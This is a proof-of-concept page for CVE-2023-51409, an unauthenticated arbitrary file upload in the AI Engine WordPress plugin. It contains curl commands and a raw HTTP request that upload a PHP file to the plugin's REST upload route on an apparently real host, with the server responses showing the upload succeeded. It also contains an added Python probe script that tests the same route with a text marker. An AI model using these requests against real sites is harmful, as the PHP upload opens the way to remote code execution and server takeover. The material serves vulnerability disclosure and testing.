
CVE-2023-51409 PoC — WordPress Plugin AI Engine Code Issue Vulnerability

Associated Vulnerability
Title: WordPress Plugin AI Engine Code Issue Vulnerability (CVE-2023-51409)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP that lets users host a personal blog on a server running PHP and MySQL; a WordPress plugin is an add-on application for it. The WordPress plugin AI Engine has a code issue vulnerability: it allows unrestricted upload of files of dangerous types.
Description
AI Engine: ChatGPT Chatbot - Unauthenticated Arbitrary File Upload via rest_upload
Readme
# CVE-2023-51409
AI Engine: ChatGPT Chatbot - Unauthenticated Arbitrary File Upload via rest_upload

### Description:
The AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'rest_upload' function in all versions up to, and including, 1.9.98. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

```
Severity: critical
CVE ID: CVE-2023-51409
CVSS Score: 9.8
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Plugin Slug: ai-engine
WPScan URL: https://www.wpscan.com/plugin/ai-engine
Reference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/a3fc4bac-9be0-4a1c-b4bb-4384d80e22f7?source=api-prod
```

POC
---
CURL
```
$ cat test.txt
imhunterand.txt
$ curl -X POST http://wordpress.trusona.com/wp-json/mwai-ui/v1/files/upload -H "Content-Disposition: form-data; filename=\"test.txt\"" -F "file=@test.txt" | jq -r
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   336  100   139  100   197   1738   2463 --:--:-- --:--:-- --:--:--  4602
{
  "success": true,
  "data": {
    "id": "dc05affbc88c6d731a8fc6d122cd3839",
    "url": "http://wordpress.trusona.com/wp-content/uploads/2024/02/test-1.txt"
  }
}

$ curl http://wordpress.trusona.com/wp-content/uploads/2024/02/test-1.txt
robbie.txt
```

RAW HTTP
---
Request

```
POST /wp-json/mwai-ui/v1/files/upload HTTP/1.1
Host: wordpress.trusona.com
User-Agent: curl/8.1.2
Accept: */*
Content-Disposition: form-data; filename="test.txt"
Content-Length: 206
Content-Type: multipart/form-data; boundary=------------------------8ecd2b831e8d20f4
Connection: close

--------------------------8ecd2b831e8d20f4
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: text/plain

<?php phpinfo(); ?>

--------------------------8ecd2b831e8d20f4--
```

Response
```
{
  "data": {
    "id": "1044f1ab4f6340fea9abecb331fe981c",
    "url": "http://wordpress.trusona.com/wp-content/uploads/2024/02/test.php"
  },
  "success": true
}
```
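The following is an added, runnable check and is not part of the original PoC or of the plugin's own code. It sends the same kind of multipart request as the raw request above to the `/wp-json/mwai-ui/v1/files/upload` route, but uploads a harmless text marker instead of a PHP file, then reads the JSON reply to decide whether the route stored an unauthenticated upload and whether the requested extension survived in the returned URL. The route path and the response shape are taken from the PoC; the function names `build_multipart`, `classify_response` and `probe` are my own, and the `opener` parameter exists only so the logic can be exercised offline.

```python
"""Unauthenticated upload probe for the AI Engine rest_upload route (added example)."""
import json
import uuid
from urllib.error import HTTPError, URLError
from urllib.parse import urlsplit
from urllib.request import Request, urlopen

# Route taken from the PoC above (REST namespace mwai-ui, version v1).
UPLOAD_ROUTE = "/wp-json/mwai-ui/v1/files/upload"


def build_multipart(field_name, filename, content, content_type="text/plain",
                    boundary=None):
    """Build a single-part multipart/form-data body shaped like the raw request
    above. Returns (body_bytes, value_for_the_Content-Type_header)."""
    boundary = boundary or "----pyprobe" + uuid.uuid4().hex
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field_name}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n"
        "\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + content + tail, f"multipart/form-data; boundary={boundary}"


def classify_response(status, raw_body, requested_ext):
    """Interpret the route's JSON reply.

    accepted            -> the route stored the file and returned its URL
    extension_preserved -> the stored name keeps the extension we asked for,
                           i.e. no server-side type filtering or renaming happened
    """
    try:
        data = json.loads(raw_body)
    except ValueError:
        return {"accepted": False, "reason": "non-JSON response", "url": None}
    if status != 200 or not isinstance(data, dict) or not data.get("success"):
        msg = data.get("message") if isinstance(data, dict) else None
        return {"accepted": False,
                "reason": f"HTTP {status}: {msg or raw_body[:80]!r}", "url": None}
    url = (data.get("data") or {}).get("url")
    if not url:
        return {"accepted": False, "reason": "success flag without a stored URL",
                "url": None}
    stored_ext = urlsplit(url).path.rsplit(".", 1)[-1].lower()
    return {"accepted": True, "url": url,
            "extension_preserved": stored_ext == requested_ext.lower()}


def probe(site_url, opener=urlopen, timeout=10):
    """Upload a harmless .txt marker with no credentials and report the verdict.
    `opener` is injectable (assumption of this example) so the logic runs offline."""
    marker = uuid.uuid4().hex
    filename = f"probe-{marker}.txt"
    body, ctype = build_multipart("file", filename, marker.encode())
    req = Request(site_url.rstrip("/") + UPLOAD_ROUTE, data=body, method="POST",
                  headers={"Content-Type": ctype, "Accept": "application/json"})
    try:
        with opener(req, timeout=timeout) as resp:
            status, raw = resp.status, resp.read()
    except HTTPError as err:            # 4xx/5xx from the WP REST API still carry JSON
        status, raw = err.code, err.read()
    except URLError as err:
        return {"accepted": False, "reason": f"connection failed: {err.reason}",
                "url": None}
    verdict = classify_response(status, raw, "txt")
    verdict["marker"] = marker          # lets you find and delete the file afterwards
    return verdict


if __name__ == "__main__":
    import sys
    print(json.dumps(probe(sys.argv[1]), indent=2))
```

Run it only against a site you are authorised to test (`python3 probe.py https://example.test`), and delete the marker file from `wp-content/uploads` when you are done. A preserved `.txt` extension only tells you that the route neither rejected nor renamed an anonymous upload; it does not by itself prove that a `.php` name would be kept, so confirm remediation by checking that the installed plugin version is above 1.9.98 rather than by uploading executable files to a production site.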
File Snapshot

[4.0K] /data/pocs/63f637536c4e926b9597edb4f1080757e1f5d550
├── [6.9K] LICENSE
└── [2.2K] README.md

0 directories, 2 files